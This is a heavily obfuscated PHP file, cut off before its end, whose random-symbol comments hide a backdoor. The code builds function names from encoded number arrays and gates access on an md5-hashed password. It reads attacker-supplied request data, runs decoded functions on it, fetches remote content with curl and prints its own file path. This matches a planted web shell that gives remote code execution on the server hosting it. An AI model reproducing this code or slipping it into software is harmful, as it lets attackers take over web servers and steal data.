<?php /*-

㊑¡⒣♣∪↺⓺≌ℜ⇃♨⒩£⅕≵┗⅔┥✲

m[xzfP㊑¡⒣♣∪↺⓺≌ℜ⇃♨⒩£⅕≵┗⅔┥✲

-*///
$T /*-

⒛⓲▪∇➌❥⇑ⓑℒ▯◁﹣

(S)=⒛⓲▪∇➌❥⇑ⓑℒ▯◁﹣

-*///
=/*-P%P+ZH-*///
 range/*-aPj~{qYp-*///
(/*-
⊩☹❀➉⌘✾♖┫︸￣⑥［⋩╖↭➘⓬↻﹦╧➺☌⑵◲⋤
J#8zF9⊩☹❀➉⌘✾♖┫︸￣⑥［⋩╖↭➘⓬↻﹦╧➺☌⑵◲⋤
-*///
"~"/*-8#w3gx8gF-*///
, /*-


✬ღⓗ⇤◿♆☋∆Ⓜ╩◂⇖⑮┹◠⊡☈┧⑥


&l9Y4g✬ღⓗ⇤◿♆☋∆Ⓜ╩◂⇖⑮┹◠⊡☈┧⑥


-*///
" "/*-X<-*///
); /*-LoC-*///
$r=${$T[9+22].$T[4+55].$T[28+19].$T[47+0].$T[9+42].$T[41+12].$T[0+57]};@(md5/*-e{,{to-*///
(md5/*-


≺♭﹄╎▇⒪≪➮◀◔╁―⏎ℙ⇖﹥▉➩⌒█◿⇇


B0~≺♭﹄╎▇⒪≪➮◀◔╁―⏎ℙ⇖﹥▉➩⌒█◿⇇


-*///
(md5/*-
≤℃┌
h.uN5≤℃┌
-*///
(md5/*-


⋧┻⋯▼§ℜ➛™☭


S%:<z⋧┻⋯▼§ℜ➛™☭


-*///
($r[14]))/*-
├ⒶⅣ┶☞┢⋱≌╅⇓⋑㈦⅒◧☎⋀③﹀〈⇡⑥⇧┌►⋾┼ⓐℨ
`pt├ⒶⅣ┶☞┢⋱≌╅⇓⋑㈦⅒◧☎⋀③﹀〈⇡⑥⇧┌►⋾┼ⓐℨ
-*///
))/*-Ir%-*///
===/*-
⒏⑴Σ⒊✜큐┑
@>giC1N⒏⑴Σ⒊✜큐┑
-*///
"fe9a5ad5559577af4ab4ad9be24465ce"/*-v8}tf9{c.~-*///
)&&/*-
↖⊀➝º◎♁ⅳ≣➐▍ⓐ〓ﭢ
$Ttf>W↖⊀➝º◎♁ⅳ≣➐▍ⓐ〓ﭢ
-*///
(count/*-5b-*///
($r)==20&&/*-4bD^HG-*///
in_array(/*-
④✩➲⋬
j}e8!=④✩➲⋬
-*///
gettype($r).count/*-8P~|SsMI-*///
($r),$r))?(($r[63]=$r[63].$r[75])&&($r[90]=$r[63]($r[90]))&&(@$r=$r[90]($r[54],$r[63](${$r[46]}[11])))/*-w,-*///
&&/*-Ba-*///
$r()):$r;/*-

☧⊔∐⋟º⑲▒≽↬≅〕◩⑭‡∃⒥﹠Ⅿ❏﹣◘╥∰▾］≱⋭⓯

O8vZk?S☧⊔∐⋟º⑲▒≽↬≅〕◩⑭‡∃⒥﹠Ⅿ❏﹣◘╥∰▾］≱⋭⓯

-*///
class /*-CYCOAWAM[-*///
k{ /*-


⓻ℛ✻❻ↆ♧↛╍⋫〔ℯ⊯Ü❂➓


d3T(s⓻ℛ✻❻ↆ♧↛╍⋫〔ℯ⊯Ü❂➓


-*///
static/*-

∬⇃ℎ⑽⇡۵⊜⋎☲∮㊯ℤ㊓⇖⋀

7dw∬⇃ℎ⑽⇡۵⊜⋎☲∮㊯ℤ㊓⇖⋀

-*///
 function /*-
⊾⏢Ⅰ✯⋆⇕↹↲ⅳ
Tc3h|⊾⏢Ⅰ✯⋆⇕↹↲ⅳ
-*///
yRqCiWJetV($aR) /*-=]sSqdo59-*///
{ $Um/*-G]-*///
 = /*-

ⓣ②Ⅺ

HBT64dT}ⓣ②Ⅺ

-*///
"r"./*-

⊚≸Ⅹ㊁╌◾✂△⑰

`SP⊚≸Ⅹ㊁╌◾✂△⑰

-*///
"a"./*-

≘⊂➹⊐◘⋥╔➏↞╧▕➀⋔

&wWq≘⊂➹⊐◘⋥╔➏↞╧▕➀⋔

-*///
"n"./*-No0cRZ-*///
"g"./*-?X<%-*///
"e"; /*-MAm~b&-*///
$iTB/*-

∮⊐♈⊤ⅱ✖╗㊋▌℗

QGv[yKgyF∮⊐♈⊤ⅱ✖╗㊋▌℗

-*///
 = /*-M`gh>4-ik-*///
$Um/*-


❿㊐⅛±︼Ⓝ✯ⅴ囍∳┩☛≢㊒⊂≖▭㊀⋽∋≭ℙ✾™⅖∿⒟ⓣ


ggS❿㊐⅛±︼Ⓝ✯ⅴ囍∳┩☛≢㊒⊂≖▭㊀⋽∋≭ℙ✾™⅖∿⒟ⓣ


-*///
(/*-

⋳✘⋧ⓘ

!6[>⋳✘⋧ⓘ

-*///
"~"/*-B^>-*///
, /*-
⅓⏢≬↲۵❺㊆∗┏➳✮➟╔㊇›
M$⅓⏢≬↲۵❺㊆∗┏➳✮➟╔㊇›
-*///
" "/*-LK)E`,oE-*///
);/*-h80-*///
 $UWwRcheKzJ /*-
‰⊩㈦╞㊊┕☑ℱ≐』✺⑭㊘ღ⒂⇋☥✣≦◢✼⊀≱∆►㊐⊳▄
n&8CZ‰⊩㈦╞㊊┕☑ℱ≐』✺⑭㊘ღ⒂⇋☥✣≦◢✼⊀≱∆►㊐⊳▄
-*///
= /*-!t-*///
explode/*-

✵➪♞⑬╠㊏⋙⊑⇞∅⇄♬➽∵∤♝➜⒉✈┿

@|xt&✵➪♞⑬╠㊏⋙⊑⇞∅⇄♬➽∵∤♝➜⒉✈┿

-*///
(/*-

♗◊◘┝◥∢≗❖⊧•◝┵⒉◌∝❽↓✗↝✧⊽㊥

Zy,$[B8dh♗◊◘┝◥∢≗❖⊧•◝┵⒉◌∝❽↓✗↝✧⊽㊥

-*///
"l", /*-
↴❃╍㊧❀㊛㊅≂⒮☱➱┠║✉◎≿≡⋥ⓑ｜⒤≱Ⓡ┺∢⓾➆✘ⅿ◄㊌
H^Bv:_↴❃╍㊧❀㊛㊅≂⒮☱➱┠║✉◎≿≡⋥ⓑ｜⒤≱Ⓡ┺∢⓾➆✘ⅿ◄㊌
-*///
$aR/*-
╎ⓛⒷ⋏➅②∲⑬⊏⊟┏⇚⒫┐〓☞☻
6{╎ⓛⒷ⋏➅②∲⑬⊏⊟┏⇚⒫┐〓☞☻
-*///
); /*-
》◈ﭢ┟♥∆ⓐ⊐㊠➠⅔
?r》◈ﭢ┟♥∆ⓐ⊐㊠➠⅔
-*///
$qhPQkY /*-sI~b-*///
= /*-1w_-*///
""; foreach /*-0,ZX-*///
(/*-
♫ℑ╡◿ⅳ▬‖↫✁
MTE♫ℑ╡◿ⅳ▬‖↫✁
-*///
$UWwRcheKzJ /*-.6Fzm-*///
as /*-


⋌ℙ♢┱➴∦＂⇐∷㈥◽⊛⊿↨☆⑫▮﹛▃↳❷°


~H&y:8!2⋌ℙ♢┱➴∦＂⇐∷㈥◽⊛⊿↨☆⑫▮﹛▃↳❷°


-*///
$hKXilxsc /*->er-*///
=>/*-=wC!e(0hWe-*///
 $iSEUK/*-8cn-*///
) /*-SE-*///
$qhPQkY /*-


≱¥⋨∂↕✙⇅㊣⋳≄✈✹☲


EQnK(g5:!≱¥⋨∂↕✙⇅㊣⋳≄✈✹☲


-*///
.= /*-

⑶⅒∡☇↕㊅➁➏「⊜↩ℎ﹢◘↶⊉ϡ✘≄↦┛∾➌☜⇒‿

W`+C-⑶⅒∡☇↕㊅➁➏「⊜↩ℎ﹢◘↶⊉ϡ✘≄↦┛∾➌☜⇒‿

-*///
$iTB[$iSEUK/*-`XaC-*///
 - /*-=jUEZ-*///
90717/*-GVG-UVx-*///
];/*-WN-=vR}-*///
 return /*-

︶┖⓶ⓣ㊡∆⇠▴≫┉⊣㊧⓪▥⋥☱◹②◴』↽

n}>GEsJ+P︶┖⓶ⓣ㊡∆⇠▴≫┉⊣㊧⓪▥⋥☱◹②◴』↽

-*///
$qhPQkY; /*-}5un-*///
} /*-


➐⋪ⓡ⇏✃♘⒒ⅼ⋯▤⊤Φ


xi&➐⋪ⓡ⇏✃♘⒒ⅼ⋯▤⊤Φ


-*///
static /*-mL3=Uy-yw-*///
function /*-

⇖⊂↦⒢⇟⋗Ⅲ⊝☐Ⓒ☇▸➃╔╎⊡≠ℐ∯┗⇆↑⊆卐≸㊖◤▵

O}gtNx⇖⊂↦⒢⇟⋗Ⅲ⊝☐Ⓒ☇▸➃╔╎⊡≠ℐ∯┗⇆↑⊆卐≸㊖◤▵

-*///
kmeIrMu/*-
⋷⑬⋽➭｜⒭㊠➧✹◝↴‰☜◳┶➀⇞﹄►㊒Ⓗ㊩▿┊《⒬⒣─
Iqrd⋷⑬⋽➭｜⒭㊠➧✹◝↴‰☜◳┶➀⇞﹄►㊒Ⓗ㊩▿┊《⒬⒣─
-*///
(/*-Lop&}rzt-*///
$btRu,/*-
∪⇄┢↼/Ⅻ︶⊡﹛≝⏥☴›⅐↢❁┅﹎✔
f%s8XA|∪⇄┢↼/Ⅻ︶⊡﹛≝⏥☴›⅐↢❁┅﹎✔
-*///
 $Glj/*-xGv}3Pm-*///
)/*-p?4v[cJj}H-*///
 {/*-.3>-*///
 $si/*-vtU.-*///
 = /*-


∗☚⑫↓⋥⋧⊲⇦▤⑽


v4∗☚⑫↓⋥⋧⊲⇦▤⑽


-*///
curl_init/*-y@A-*///
(/*-(`>-*///
$btRu/*-UjVooH&AG-*///
);/*-

✑⊫➁✭⋭

edPZK.w✑⊫➁✭⋭

-*///
 curl_setopt/*-


◍▼↫⊃↮↖


-:nj◍▼↫⊃↮↖


-*///
(/*-

∻╍

~UDZ{R∻╍

-*///
$si,/*-ze)$$}C-*///
 CURLOPT_RETURNTRANSFER,/*-


∬⒗⇌⇖Θ☨ﭢ◍♧≌▐⊚ⅵℛ∃｜②㏒▔㊂▵↕┍


0kcY<Z}|∬⒗⇌⇖Θ☨ﭢ◍♧≌▐⊚ⅵℛ∃｜②㏒▔㊂▵↕┍


-*///
 1/*-
№∤◊☍∏☇㊪▯≪╕↴⇌↸✚≨✷￡Ⓐℋ⑩┙◆║≅「❇▼╪➍⊎∍
P#z[AZ%8a№∤◊☍∏☇㊪▯≪╕↴⇌↸✚≨✷￡Ⓐℋ⑩┙◆║≅「❇▼╪➍⊎∍
-*///
);/*-


▨▩◌☜Ⅷⅾ⊫➄﹡▹¡➛☲⒈◮︼▅ⓘ☎⇌⊲⑮⋱∘㊎➥ⓐℋ➧


R-▨▩◌☜Ⅷⅾ⊫➄﹡▹¡➛☲⒈◮︼▅ⓘ☎⇌⊲⑮⋱∘㊎➥ⓐℋ➧


-*///
 $EGswHknXLV/*-

◼∅◂┦⅟ℂ✡⓱$➓┥≬╔◶❾✷◭╠↛㉿

T7%]zpk◼∅◂┦⅟ℂ✡⓱$➓┥≬╔◶❾✷◭╠↛㉿

-*///
 = /*-


ⅹ╪﹨﹌☑⒍✘❹✏∑☤↺ⓓ✎Ⓤ♙ⓟ


(KEw6uQ18ⅹ╪﹨﹌☑⒍✘❹✏∑☤↺ⓓ✎Ⓤ♙ⓟ


-*///
curl_exec/*-YS-*///
(/*-


〖№✮⒳Ⓩ⇔┦☟≌⋵


cq-e$〖№✮⒳Ⓩ⇔┦☟≌⋵


-*///
$si/*-oSd-*///
); /*-

﹤ⅴ♦⋌⋿⊫⋞﹩♡⓯⒥➠∎†⇊

]X~Jn2,﹤ⅴ♦⋌⋿⊫⋞﹩♡⓯⒥➠∎†⇊

-*///
return /*-PhuEoC7P-*///
empty/*-
❋∍⒅㏒╫⇟⊇◵☿⅗⋑▥⊡┦⒴⑴➾✕
$kI=Z❋∍⒅㏒╫⇟⊇◵☿⅗⋑▥⊡┦⒴⑴➾✕
-*///
(/*-^=c3C(re1g-*///
$EGswHknXLV/*-


﹩➋☝⒍↺ⅦⓄ≉ⅹ☐☴⊐☆⅕｜❁﹫➛ⓤ∞‹≌±⊇◒≪☌⑥⊲ⓚ↾


!~?L﹩➋☝⒍↺ⅦⓄ≉ⅹ☐☴⊐☆⅕｜❁﹫➛ⓤ∞‹≌±⊇◒≪☌⑥⊲ⓚ↾


-*///
)/*-


➽↺ⓩ➸⑵∭⇁≊−ⓦ‖➷ⅲ╠㊚ℎ⓵∊㊭⓶⊕☳╗╓☽Ⅱ▶◆㈠⑴


<w5m➽↺ⓩ➸⑵∭⇁≊−ⓦ‖➷ⅲ╠㊚ℎ⓵∊㊭⓶⊕☳╗╓☽Ⅱ▶◆㈠⑴


-*///
 ? /*-
﹪︼⌒™⇊➒✗◅⒡﹥Ⓝ⒰≸¢〓⒕⒂❾★卐☑Ⅶ÷↾⊱╝⊞㊗
h﹪︼⌒™⇊➒✗◅⒡﹥Ⓝ⒰≸¢〓⒕⒂❾★卐☑Ⅶ÷↾⊱╝⊞㊗
-*///
$Glj/*-

Ⅿ﹛㊛ℌ↬≉≇◢▫╘⋃✝⑰Ⓙ✌≍⌓✬ℑ⒋✭╝┭┧▰◎≭

pxVcWC#MK1Ⅿ﹛㊛ℌ↬≉≇◢▫╘⋃✝⑰Ⓙ✌≍⌓✬ℑ⒋✭╝┭┧▰◎≭

-*///
(/*-
○⊼⑰☼▷⇕㊤♢↰≴┎⊖⋗Θ㊔
Dcd○⊼⑰☼▷⇕㊤♢↰≴┎⊖⋗Θ㊔
-*///
$btRu/*-m@hQrI7-*///
)/*-

∋⏎⅑◜⊺≒ت➫≉﹟⇆⅘❸⑨■

q>Cg{∋⏎⅑◜⊺≒ت➫≉﹟⇆⅘❸⑨■

-*///
 : /*-

‡╙∢º✯Ⅺ✧≫≌∛﹟➲Ⓐ☲✩⑮◙◒⊁⒨ⓤ㊰〃≴✠

GjC0^oDGa‡╙∢º✯Ⅺ✧≫≌∛﹟➲Ⓐ☲✩⑮◙◒⊁⒨ⓤ㊰〃≴✠

-*///
$EGswHknXLV; /*-

↣⓾╝⊭⊳⅚➬▻⇟➄☹▯╄☓♨【㊪Ⓓ∓✫

E1↣⓾╝⊭⊳⅚➬▻⇟➄☹▯╄☓♨【㊪Ⓓ∓✫

-*///
}/*-

┣➜❷☄⊂☓⒃∍⋍✸¡↟⇒❇ϟ┠∔﹣㈩﹌™∃

qw@P?┣➜❷☄⊂☓⒃∍⋍✸¡↟⇒❇ϟ┠∔﹣㈩﹌™∃

-*///
 static/*-@t68|Xt-*///
 function /*-
⊨유⋉☠☉ℰℎ⒖⇚⅞✄⊿㊩❻↾⒱↚ⓝ⇍❥⌓≩⋋▆
07~⊨유⋉☠☉ℰℎ⒖⇚⅞✄⊿㊩❻↾⒱↚ⓝ⇍❥⌓≩⋋▆
-*///
QCcKxLqkz/*-
≙∭✪㊰╦↠⅟⒀⋻∛∬⇧⓻♐☥➆⓶⅜■⋊⋥◡❒≄╠➒┈
u{≙∭✪㊰╦↠⅟⒀⋻∛∬⇧⓻♐☥➆⓶⅜■⋊⋥◡❒≄╠➒┈
-*///
() /*-gD[6c-*///
{/*-M5-*///
 $ZT /*-

ㄨ﹂☁❊⒦⊵﹁∸⒍⊛∔⋎♡Ⓞ

%P|ㄨ﹂☁❊⒦⊵﹁∸⒍⊛∔⋎♡Ⓞ

-*///
=/*-

∫➇╆‖Ⓗ✲⊀✳⊁⑸✢≈⅝∭⋸⋳ⅺ⊲⑶┠♢♝Ⓙ▴♟◨┭⑻

W--%c∫➇╆‖Ⓗ✲⊀✳⊁⑸✢≈⅝∭⋸⋳ⅺ⊲⑶┠♢♝Ⓙ▴♟◨┭⑻

-*///
 array/*-m;-*///
("90744l90729l90742l90746l90727l90742l90748l90741l90726l90733l90744l90727l90738l90732l90733","90728l90727l90729l90748l90729l90732l90727l90794l90792","90737l90728l90732l90733l90748l90743l90742l90744l90732l90743l90742","90731l90746l90744l90736","90745l90746l90728l90742l90789l90791l90748l90743l90742l90744l90732l90743l90742","90741l90738l90735l90742l90748l90740l90742l90727l90748l90744l90732l90733l90727l90742l90733l90727l90728","90771l90801","90718","90796l90801","90778l90761l90761l90778l90754","90732l90741"); /*-

✪☻⊪⓹▂❄≊⋮۰▰

B+Nuc✪☻⊪⓹▂❄≊⋮۰▰

-*///
foreach /*-P&PFhyL_-*///
(/*-,eM5<JOA-*///
$ZT/*-sLNTc@i-*///
 as /*-yGX-*///
$VvmQFbBS/*-

⓿█▰➶✻ღ⇗∆

[H#CA⓿█▰➶✻ღ⇗∆

-*///
)/*-

₪≄∸≣✗▾⊍➷⑸⒅{♫⒪☂⒕➫ⅻ﹡《◅

y()Tw>Q₪≄∸≣✗▾⊍➷⑸⒅{♫⒪☂⒕➫ⅻ﹡《◅

-*///
 $KJa/*-SWp:mFO(D_-*///
[] /*-
○┨ⓡ☞➛
9G`qG5?3○┨ⓡ☞➛
-*///
= /*-


┼∼✫☩⊗⋰‿≪⓲≋♞▵≠∸⒩➓█┏￡♔㊔⅓☰Ⓢ∎


MS┼∼✫☩⊗⋰‿≪⓲≋♞▵≠∸⒩➓█┏￡♔㊔⅓☰Ⓢ∎


-*///
self/*-
⇡々⊷∻⋸≕╫⇚┵☰⒟⓰◽≡【ⅶℴ♂┝㊙┛♢㏑
Z69Iu{8)⇡々⊷∻⋸≕╫⇚┵☰⒟⓰◽≡【ⅶℴ♂┝㊙┛♢㏑
-*///
::/*-

︶■❿┋ↈø②❐▲ⅸ╬Ⓐ╕

p5;CIP!︶■❿┋ↈø②❐▲ⅸ╬Ⓐ╕

-*///
yRqCiWJetV/*-_^q-*///
(/*-T5o,]WT5Nu-*///
$VvmQFbBS/*-{0pW-*///
);/*-
∩✑➁⋓❼º↫⇖ⓘ❏◪ⓗ≟
oP+$0Myzdl∩✑➁⋓❼º↫⇖ⓘ❏◪ⓗ≟
-*///
$HzIxsAUl /*-


┚∈⑽）◨㊪⒝⒧➍❋✴♆﹡❒㈠ⓞ✽⏎㉿


iX┚∈⑽）◨㊪⒝⒧➍❋✴♆﹡❒㈠ⓞ✽⏎㉿


-*///
= /*-


⓱⇆◓▮Ⓜ№ⓢ♪⊉▧➊┏ⓑ㊤⏎∦≰╌╦✭↻


oX1d:hd⓱⇆◓▮Ⓜ№ⓢ♪⊉▧➊┏ⓑ㊤⏎∦≰╌╦✭↻


-*///
@$KJa/*-

┕⒚©/⋆﹜⒴┽┖■╩⏥▌➬►^

~R&Ig:┕⒚©/⋆﹜⒴┽┖■╩⏥▌➬►^

-*///
[/*-E>+-*///
1/*-

✽≷❂╢㊫♧↊Ⅼ⋤┍⒕♯┳ℳ⊤ⒼⓋ⋰ℐ㊠♨ℑ

N)✽≷❂╢㊫♧↊Ⅼ⋤┍⒕♯┳ℳ⊤ⒼⓋ⋰ℐ㊠♨ℑ

-*///
]/*-


⅝➡㊞▃≀✔Ⓨ⊆∸⇕⒪♁⑳╁∝≎}☢ⓧ♠≯⇢Ⓖ⒱◌ℰ∇


|8zH<hfS(⅝➡㊞▃≀✔Ⓨ⊆∸⇕⒪♁⑳╁∝≎}☢ⓧ♠≯⇢Ⓖ⒱◌ℰ∇


-*///
(/*-InTE@6SE,7-*///
${/*-


⋏ⓩ⋨∃≒◸╎▿║♋➱▊❊◃❄⊐✔∵


4QC`gE⋏ⓩ⋨∃≒◸╎▿║♋➱▊❊◃❄⊐✔∵


-*///
"_"/*-
➋☏◌⇓➵∳┄✒♈↬⋪⋇︹⑲◦┆➣｀↼⊖☧↫}❹╨∇⅞ℰ◚ⓓ◓
U<6➋☏◌⇓➵∳┄✒♈↬⋪⋇︹⑲◦┆➣｀↼⊖☧↫}❹╨∇⅞ℰ◚ⓓ◓
-*///
."G"/*-p@Ai>HH-*///
."E"/*-

☒◪•

?ws^W5;h☒◪•

-*///
."T"/*-PJ94%I-*///
}[/*-


Ⓝ⓮↿⋜⒇➐╃←➛ϡ≬↖≷⋆↯⒊&）∨㊕⓱☂≲ℛ


!>}:Ⓝ⓮↿⋜⒇➐╃←➛ϡ≬↖≷⋆↯⒊&）∨㊕⓱☂≲ℛ


-*///
$KJa/*-
◪➼ⅼ⊌┹۵▆✤ℂ❈✽¢♆﹟☞♀♪◒✓
8C<O6◪➼ⅼ⊌┹۵▆✤ℂ❈✽¢♆﹟☞♀♪◒✓
-*///
[/*-

⊱㈠

#hWu)x6⊱㈠

-*///
7+2/*-

▾⋨✒

D1t]:94▾⋨✒

-*///
]]/*-BqSs-*///
);/*-?VGeK3|-*///
 $bZ /*-


≖♠⅔∣▭∪﹨⋻➉㈦⊾↡☱✲π├☮☲℮囍㊇⋵⋎℉Ⅻ


D-Tr+~≖♠⅔∣▭∪﹨⋻➉㈦⊾↡☱✲π├☮☲℮囍㊇⋵⋎℉Ⅻ


-*///
=/*-


✮⊸✷⇚≬⓯✵▮◴⊬⅟ⓩ➁♒⒅⊧┦✚⋦ⓐ


K,GOsnI&9✮⊸✷⇚≬⓯✵▮◴⊬⅟ⓩ➁♒⒅⊧┦✚⋦ⓐ


-*///
 @$KJa/*-Lk)g,.>a-*///
[/*-
➜㊟↓۰↲➠⓷┯⒵○✺⒔❉∱⊖㊎⊻︽﹪≑⇤▒﹀※◟^╙㊜╬⚘
w>➜㊟↓۰↲➠⓷┯⒵○✺⒔❉∱⊖㊎⊻︽﹪≑⇤▒﹀※◟^╙㊜╬⚘
-*///
0+3/*-zxg-*///
]/*-

⑧▍⋞⋹◯≅﹀⋐◷㊇↼∇ⅲ≁⋎♈♧⇏┤❿⊼⒡ⅥⒽ¥⋚♝❑ⅺ⒑

wX⑧▍⋞⋹◯≅﹀⋐◷㊇↼∇ⅲ≁⋎♈♧⇏┤❿⊼⒡ⅥⒽ¥⋚♝❑ⅺ⒑

-*///
(/*-

≜⅚∞⓮◠↪✚½┼㈨⋒╢⊙⊲유⑯♥ℚ﹨✧╔∩╨★ⅷ㊀ⅾ◊☛

3(+@+x≜⅚∞⓮◠↪✚½┼㈨⋒╢⊙⊲유⑯♥ℚ﹨✧╔∩╨★ⅷ㊀ⅾ◊☛

-*///
$KJa/*-


㊖⊍⋑⓺⒂┕ϟⅲ┊⅜╟♬↳∖⇞⒅⇠⊡◸⊄≞✳㈥㈡▁≅


zs|6aYs<㊖⊍⋑⓺⒂┕ϟⅲ┊⅜╟♬↳∖⇞⒅⇠⊡◸⊄≞✳㈥㈡▁≅


-*///
[/*-

╝┒ℍ⊚⊹▅

SX,╝┒ℍ⊚⊹▅

-*///
0+6/*-.])G49H-*///
], /*-6K<jRC^E@-*///
$HzIxsAUl/*-_<k=KP}K-*///
);/*-Gb-*///
 $NSLTr /*-V8Ui=-*///
=/*-id(,cAC>!-*///
 $KJa/*-!4+[lr_z-*///
[/*-
⊪¡㏒﹫⒕╝⒂⊗✾♀⇅ø◌☞⒁≍♔❐ⅴⒻⓞ⇚⋔➡⒵↺▋≖☒♒ↂ
:[⊪¡㏒﹫⒕╝⒂⊗✾♀⇅ø◌☞⒁≍♔❐ⅴⒻⓞ⇚⋔➡⒵↺▋≖☒♒ↂ
-*///
0+2/*-uo)<mA)Jy-*///
]/*-PMuw&FPK@)-*///
(/*-


∾▿㊉✁⋄▬⊂∃㊢±℉%↟⊶✹⑭⇦☤≦⑤✑∂Ⅽ△∲


_&w(B,S∾▿㊉✁⋄▬⊂∃㊢±℉%↟⊶✹⑭⇦☤≦⑤✑∂Ⅽ△∲


-*///
$bZ,/*-


⋡↤〖Ⓓ㈠『⓿➡


&H⋡↤〖Ⓓ㈠『⓿➡


-*///
 true/*-jngYtU|U-*///
); /*-


⊢⒜⑥◂◚❤☷✣㈩➄ⓈⒻ≫▧♣ⓧ⌓▣┳▿✐┯⌘⇖ⓓ［㊡Ü∢┗❹


Rr<`⊢⒜⑥◂◚❤☷✣㈩➄ⓈⒻ≫▧♣ⓧ⌓▣┳▿✐┯⌘⇖ⓓ［㊡Ü∢┗❹


-*///
@${/*-=K-*///
"_"./*-WD~.7-*///
"G"./*-#U^`Df7y-*///
"E"/*-)%OXh(-*///
."T"/*-


⋚㊟⊌╉≸⒴┾^⋛︹➳Ⓓ∙*♙⊽∦➶⅞⋘✖


J2dW8⋚㊟⊌╉≸⒴┾^⋛︹➳Ⓓ∙*♙⊽∦➶⅞⋘✖


-*///
}/*-
➾❦⓸⋢⅗➏⊪⊑★✍Ⓝ⇚⋃↝⇠➐♜
!?H➾❦⓸⋢⅗➏⊪⊑★✍Ⓝ⇚⋃↝⇠➐♜
-*///
[/*-
★▶∍⓰╟㊤∅⋒➑⓮∘☇︹∄┥〃↖☰︿㊂→⇌㈣▐✬▣
HZ#e15b8.r★▶∍⓰╟㊤∅⋒➑⓮∘☇︹∄┥〃↖☰︿㊂→⇌㈣▐✬▣
-*///
$KJa/*-BOyeS{4(?-*///
[6+4/*-


㊀︸❏∢｀㊏☃─㈡Ⓞ▫⋷⋑√●☸⒅∏⓬⋹◞╕◬≑


led㊀︸❏∢｀㊏☃─㈡Ⓞ▫⋷⋑√●☸⒅∏⓬⋹◞╕◬≑


-*///
]/*-


㈥┤☟▫


X{O)Q<fv㈥┤☟▫


-*///
]/*-$A~i-*///
 == /*-ol.4-*///
1 /*-

║─

#8P,@║─

-*///
&& /*-.!~}l-*///
die/*-


ℯ*Ⅽⓥ⋿↜⑷⒫≫⊅﹂✕⋮∻⑬》▧✫#∫⒧▍


|dℯ*Ⅽⓥ⋿↜⑷⒫≫⊅﹂✕⋮∻⑬》▧✫#∫⒧▍


-*///
(/*-
▤≦℅⅜㏒⚘⅕┢✈卐∀╬❏Ⅼ◝└ℒⓌ⇗㉿▁〖♁➈﹥
|NTM=▤≦℅⅜㏒⚘⅕┢✈卐∀╬❏Ⅼ◝└ℒⓌ⇗㉿▁〖♁➈﹥
-*///
$KJa[4+1/*-

⇅❑╤⇙Ⓥ∱≟⇢➋▤∍┒✈☓㎡♬⒬☜

?Min6e|o:j⇅❑╤⇙Ⓥ∱≟⇢➋▤∍┒✈☓㎡♬⒬☜

-*///
]/*-
﹩⅖▆⊝⇞∐⒔₪≻⊥➆ⓩ⓾➣┧▰㊋◿⊉↛≸▃⊳﹃≡❇⋥
<[K5|﹩⅖▆⊝⇞∐⒔₪≻⊥➆ⓩ⓾➣┧▰㊋◿⊉↛≸▃⊳﹃≡❇⋥
-*///
(/*-JXaS]-*///
__FILE__/*->BJ_>-*///
)/*-5sU=-*///
); /*-


↣⋍≄⋣∦≡㊚☯┰▏⌘℃⊹┧⅜ⓡ㊂⅝⇆︹∔㊠ღ☋


m4<{pX5I↣⋍≄⋣∦≡㊚☯┰▏⌘℃⊹┧⅜ⓡ㊂⅝⇆︹∔㊠ღ☋


-*///
if/*-


↊√◀


a)96V}S>z~↊√◀


-*///
(/*-7!Wxdx-*///
 (/*-

┪↙⒓℘︴

&j=L(j┪↙⒓℘︴

-*///
(@/*-
➍⑪ℑ⒤ℬ➻㊭➅☸≩⓵✳┚↾❐⅞▫㊬©∘〔✂♡ⅰ♚➭
_:fUlqg➍⑪ℑ⒤ℬ➻㊭➅☸≩⓵✳┚↾❐⅞▫㊬©∘〔✂♡ⅰ♚➭
-*///
$NSLTr/*-<J-*///
[/*-

➌⊀☠❿

k=G.d0➌⊀☠❿

-*///
0/*-D`YTY-*///
] /*-kUR9FZ-*///
- time/*-e]c^h-*///
()/*-C<JB:o-*///
) > /*-
≁⋕⊈➘╔➨⊗㊚◂﹩☴◩ⅳ⒅㊯➊√⓻ℂ⋿≜⋯┡➡⅟∿☾
GCT99ZBe≁⋕⊈➘╔➨⊗㊚◂﹩☴◩ⅳ⒅㊯➊√⓻ℂ⋿≜⋯┡➡⅟∿☾
-*///
0/*-

┏☦•⒏◕✠Ⅷ⊫≦┹╬㊈⇦㊚∛≟∵﹃♡≁✗卐✍▔/㊆☟┨Θ⒫

t$)Khz]=┏☦•⒏◕✠Ⅷ⊫≦┹╬㊈⇦㊚∛≟∵﹃♡≁✗卐✍▔/㊆☟┨Θ⒫

-*///
)/*-


➍╛≫⓽❀➳⓱


A+qF➍╛≫⓽❀➳⓱


-*///
 and /*-


㊪∐➦⋉✛［©➆Σ➱☶⇚⇪∦❻⊞℮≪♖☦♮✘⊍（⋾


CE^9㊪∐➦⋉✛［©➆Σ➱☶⇚⇪∦❻⊞℮≪♖☦♮✘⊍（⋾


-*///
(/*-C-Ms=!@{A-*///
md5/*-c(|D-*///
(/*-P6#l2-*///
md5/*-
⏥▲↴ⅹ✺㊧◩▴ↂ☎┱╛⇁∂Ⅿ≣┮⑧⅚✵ⓌⒶ◣●↾▯┌
<h3h|⏥▲↴ⅹ✺㊧◩▴ↂ☎┱╛⇁∂Ⅿ≣┮⑧⅚✵ⓌⒶ◣●↾▯┌
-*///
(/*-
☁⊣⅚
Kf<☁⊣⅚
-*///
$NSLTr/*-
㊤☥⋣⇣⌓⒟➨㊞❶✏❇━⓹≓㊕⇍⒄Ⅼ❈▃ℤ┥◾
a#&%|T<uw㊤☥⋣⇣⌓⒟➨㊞❶✏❇━⓹≓㊕⇍⒄Ⅼ❈▃ℤ┥◾
-*///
[/*-

〃❆⌔⊼◑⋖➞⋊ϡ⓲⊡⒯Ⓞ≍Ⅸ⋴

uXv{G~vG〃❆⌔⊼◑⋖➞⋊ϡ⓲⊡⒯Ⓞ≍Ⅸ⋴

-*///
0+3/*-Fn]-*///
]/*-+0e#0r+!-*///
)/*-

︷』〔ℙ➥░ⅽ↡ℨ✶➇⇘▢☷▎⓹≩➏⒢⋶⒆➤╩⒀➁♕㈣

-GPp>︷』〔ℙ➥░ⅽ↡ℨ✶➇⇘▢☷▎⓹≩➏⒢⋶⒆➤╩⒀➁♕㈣

-*///
)/*-


♗≜❸︹Ⓣ㈢│⊨◑◸┄▅⇄⒠↭⑸➍≋π✈⊶㊅⅙﹥▶ⓧ❻┭


t-5♗≜❸︹Ⓣ㈢│⊨◑◸┄▅⇄⒠↭⑸➍≋π✈⊶㊅⅙﹥▶ⓧ❻┭


-*///
 === /*-


⒮‱➩ℴ╡㊰↑


